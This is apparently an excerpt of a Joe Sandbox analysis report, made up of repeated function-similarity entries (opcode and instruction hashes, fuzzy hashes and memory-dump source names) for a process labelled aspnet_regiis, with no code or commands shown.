                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f8bae9f7a122151fe13e30c1aa7d6cbd045feb4edefdd980875b998cf2bb802d
                                                                                                                                                                                                              • Instruction ID: 1a5d3ce6bacdd92800097974ec4bca1a8f4718e4f7acf1a70c7a8d922b948785
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8bae9f7a122151fe13e30c1aa7d6cbd045feb4edefdd980875b998cf2bb802d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05F1BB752087418FC325CF29C995A2BBBF6FF98604F04892CE4DA87791E371E944CB92
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: b88728d8e95d1fb0c0a7bbacedea3be243ff7425f269cccb0c8da04445c8ce72
                                                                                                                                                                                                              • Instruction ID: ada70f94576cce22a055c96e93e5362122d223774d3fa438c849b35ff27fdd3a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b88728d8e95d1fb0c0a7bbacedea3be243ff7425f269cccb0c8da04445c8ce72
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAB1E036619352CFC308CF39C89162BB7E2AFCA318F1A897DE59687391D635D806CB51
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 78e7e703a2af1ddaf12d54e572ccf47730db5a1a693d7147f13dbd559135594f
                                                                                                                                                                                                              • Instruction ID: 92c05f4052f664504250b99dafff35e400251e0351b8082c12f1f79c100919f0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78e7e703a2af1ddaf12d54e572ccf47730db5a1a693d7147f13dbd559135594f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95B1167460C3818FC316CF28C49062ABFF2AFD5218F198ABDE4E64B352D635D445DB56
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: e21cfd2c0dfbe9a731d216e4de694f14dfa207122a54713caec67530eb2436ab
                                                                                                                                                                                                              • Instruction ID: 3443118432685df7c8b9c0a41e900fa6c3e1aaba94f1f093b3ed9a608b9c7ea7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e21cfd2c0dfbe9a731d216e4de694f14dfa207122a54713caec67530eb2436ab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE8104B1A083015FE725CA14CD81BBBB3E2EBC8B14F15893CE5DA97341E6319861DB56
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a6926b82874de3e48e0d1256059adfb8cfe1fbc8c76f47dca3687ad127c00aee
                                                                                                                                                                                                              • Instruction ID: dbe5c380644dcfc16424d775c5e6e05eb9facf91eb9bdded16b8d1751d5e7eff
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6926b82874de3e48e0d1256059adfb8cfe1fbc8c76f47dca3687ad127c00aee
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4471C2B4509B908BE725CF3585917A3BFE2AF53204F19895CC1EB5B386C7392006CF56
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 8f19d8c45a5fe6d1d1485503426de9e94897e164dccb56b0f74742d8e8cab66b
                                                                                                                                                                                                              • Instruction ID: 29016a2625cf5f6fd2874001b38beb78b297e6214bd7a2862eed3eaa8abbb3e1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f19d8c45a5fe6d1d1485503426de9e94897e164dccb56b0f74742d8e8cab66b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2510170600B018FC726CF29C891623B7F2FF86760B54A95DD0E78BAA5E774E405CB95
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 514f91953211b49ed71e585ef91418b7714a3f37113fcfd9b200015c495cc1e3
                                                                                                                                                                                                              • Instruction ID: b810032b26a265900b87e8ad38dba3868e1b38d569d749fcaab0fe7ec5652ceb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 514f91953211b49ed71e585ef91418b7714a3f37113fcfd9b200015c495cc1e3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA511075410B558BD3218F36C8616A3BBF3FF82624B048A5CD0C38BA95EB78B406CB95
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 8f32bd82505d7f8a92031004257a51c7f0809f864077d411e302d69b8c696c02
                                                                                                                                                                                                              • Instruction ID: 6d308f9db2a042ab95185138fc27cfbce25260b1a7c7f68d9cc6e092b2752ba2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f32bd82505d7f8a92031004257a51c7f0809f864077d411e302d69b8c696c02
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E641BD7A609746CFD300AFA9DD4276AB7E1FBC5301F268839E981C3301EB78D9158B42
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a2d63f00d47d1a374c87ed2935425f91194f97d0e409f06d3c956b3a36986d3d
                                                                                                                                                                                                              • Instruction ID: 2f4315cd61d726c1dab7a64a38cc24ef1417fdbd1d6995540212d8db1029405e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2d63f00d47d1a374c87ed2935425f91194f97d0e409f06d3c956b3a36986d3d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D52147B5808211CBDF024F34C89266273F2FF66720F655259E8A28B3E4E7359423C7C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 74042ac5f77cc9c18f5dd8a828ca44a887222aad1c5adc853a18fe35c3599a32
                                                                                                                                                                                                              • Instruction ID: a036a5e601273f8947aaa6781b9077cd0efe3d36e0a1daa1b6427be79631d5b6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74042ac5f77cc9c18f5dd8a828ca44a887222aad1c5adc853a18fe35c3599a32
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08217830100B408FD735CF35C8697A3BBF2AB16318F541A5CD0E387AC1D3BAA50A8B94
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 152b1e49d53595a8ef4f5da60a87f34593822530ee226c5974f9147c6975bfdb
                                                                                                                                                                                                              • Instruction ID: f25f32e3ac519f5650553b59f1755247c2fdf1091525101662e31a4f7911ecf4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 152b1e49d53595a8ef4f5da60a87f34593822530ee226c5974f9147c6975bfdb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4821FFB7C23D16AED7024F62EC17A383FF5A752615B778135E904A2391FA390824DB1D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 456314d3a402d8d014d1e65af56c775b97c82b00e8d3458a8bf6b3fbcc3cd2f2
                                                                                                                                                                                                              • Instruction ID: 5a99659881dc0cafadf04cdbf5ef51752574f99446e1672282bb16ceed404a01
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 456314d3a402d8d014d1e65af56c775b97c82b00e8d3458a8bf6b3fbcc3cd2f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30112337B625004FD329CD3D8CA2667A3D3EBC511032ED43EC552CB7A4DE38E8028640
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                              • Instruction ID: 07eb9ed2b56a5507c8f19bceacd365578bc375ee18ae3a6e8cba055f06e9227c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0111A933A051E50EC3028D3C84005AA7FF31A93A35F5983A9F4F99B2D6D6228D8A9755
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 67e79ac01f362a7ff78259be6d31ed4c24c246fed6ddaf8aced888d3ac85eaba
                                                                                                                                                                                                              • Instruction ID: efbf0caad02219e93db4dedcc7db0397f03a06dc09c0317a783855a5af19cab7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67e79ac01f362a7ff78259be6d31ed4c24c246fed6ddaf8aced888d3ac85eaba
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B0144F57013019BDB129E6499D4727B3FA6F85E04F14453CD9069B341DB75E805C792
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: a1cc0bf11a869c40a9a1c80b20c58aedcf9005ba4612e4aa935928f1fdf9703b
                                                                                                                                                                                                              • Instruction ID: db4497290b950f4c8c923ecbc3f62890de856976a174d0f853ae7718c166b69c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1cc0bf11a869c40a9a1c80b20c58aedcf9005ba4612e4aa935928f1fdf9703b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB017C3021A3428FEB098E15C49277AB7F3EB96710F35191CD4A397292C625D886CE55
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9e98093e8ab7abb0930d84eb6925ba6cc432f2247bd20658f92e9dcc5c2d28d1
                                                                                                                                                                                                              • Instruction ID: 521c50ff0ab7fca10061164350634bf0597fb3dfcb97dfc047f937ca29516eb3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e98093e8ab7abb0930d84eb6925ba6cc432f2247bd20658f92e9dcc5c2d28d1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69E0EC73A435217BC2254923CD5EED36D6EEE872B1B2A6524B40992B45C52C8501C5B4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 60cd3351bcdeb67139f5f6f306394be3203900353ebc82ec790fb1bf2468a26e
                                                                                                                                                                                                              • Instruction ID: d06a973cea3bebc42312153ba4edada35a98b10f477d03b7ffa9489b9b9fefda
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60cd3351bcdeb67139f5f6f306394be3203900353ebc82ec790fb1bf2468a26e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CD0125480938286D30B4F150070372FBF38F23946738388DD4F757122D6048405971D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1d3723d6453505edf9fb8b249b1cbe9d66bf5d3aee17ec8e09108f439e993e24
                                                                                                                                                                                                              • Instruction ID: 0352dce9e98fc893e5e37f25d4c36c02c4ae80ffefca1344ff13f4b51112b7ac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d3723d6453505edf9fb8b249b1cbe9d66bf5d3aee17ec8e09108f439e993e24
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8BC012FAEA11428FC5198A549C52A3A73785753808F152438D80BD7381D71DD0198557
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 010e67b431420e6f3cbb68f6ac3ef850b5705cb6986a9ff7f59cea3b3fbaf4f5
                                                                                                                                                                                                              • Instruction ID: f6fdb65c7d05acee95a64b4d328d35d320c4cdce9667beb40b876f6d48f23e38
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 010e67b431420e6f3cbb68f6ac3ef850b5705cb6986a9ff7f59cea3b3fbaf4f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7ED0C931666206EEE640AEA280526AAF3B0674A705F822838F341661D0CEA08080DB1E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
